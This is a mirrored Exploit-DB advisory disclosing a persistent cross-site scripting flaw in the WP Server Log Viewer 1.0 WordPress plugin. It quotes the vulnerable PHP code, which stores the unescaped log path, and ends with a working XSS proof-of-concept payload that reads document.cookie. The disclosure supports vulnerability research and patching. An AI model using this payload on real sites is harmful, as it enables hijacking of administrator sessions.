bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/47419.txt
Offensive Security ba928141e7 DB: 2019-09-26 
10 changes to exploits/shellcodes

SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service

Easy File Sharing Web Server 7.2 - 'New User' Local SEH Overflow
ABRT - sosreport Privilege Escalation (Metasploit)

Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting
WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
YzmCMS 5.3 - 'Host' Header Injection
2019-09-26 05:01:47 +00:00

41 lines
No EOL
1.6 KiB
Text
Raw Blame History

# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None
====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
====================================[Codepart]====================================
if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
// new log was added
$logs = get_option( 'server_logs' );
if( is_null( $logs ) ) {
$logs = [];
}
$log = trim( $_GET['logpath'] ); //only trimmed string no escaping
$logs[] = $log; //here the log will be added without security checks
$logs = array_values( $logs );
$index = array_search( $log, $logs );
update_option( 'server_logs', $logs );
wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
}
====================================[Proof of Concept]====================================
Add new log file to the plugin.
paste this exploit into the form and submit it.
<img src=# onerror=alert(document.cookie);>log.txt
It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
Reference in a new issue View git blame Copy permalink